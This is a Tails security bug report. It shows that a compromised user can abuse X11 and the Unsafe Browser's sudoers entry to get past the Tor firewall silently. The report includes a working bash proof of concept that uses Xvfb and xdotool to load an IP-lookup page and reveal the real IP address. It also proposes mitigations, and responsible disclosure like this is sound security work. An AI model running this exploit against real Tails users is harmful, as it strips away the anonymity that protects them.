The Unsafe Browser allows to retrieve the public IP address by a compromised amnesia user with no user interaction
Parent Task: #7072
The Problem
The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.
The existence of the clearnet user and the sudoers whitelist[1] for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I’ve seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:
#!/bin/bash
export DISPLAY=:69
mv /run/user/1000/bus{,.bak}
Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1
sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &
xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return
xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return
xdotool search --sync --name Your getwindowname | awk '{print $5}'
mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0
The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:
- Disable the browser by default, requiring it to be explicitly enabled in the splash screen.
- Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.
- Attempt captive portal detection[2] to detect request rewrites and enable the Unsafe Browser only then.
I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents[3]. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.
[1]:
https://git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser
[2]:
https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection
[3]: https://tails.boum.org/contribute/design/Unsafe_Browser/
Next steps
Tails 4.8 ships with an (persisting) option to disable the Unsafe Browser.
Blockers: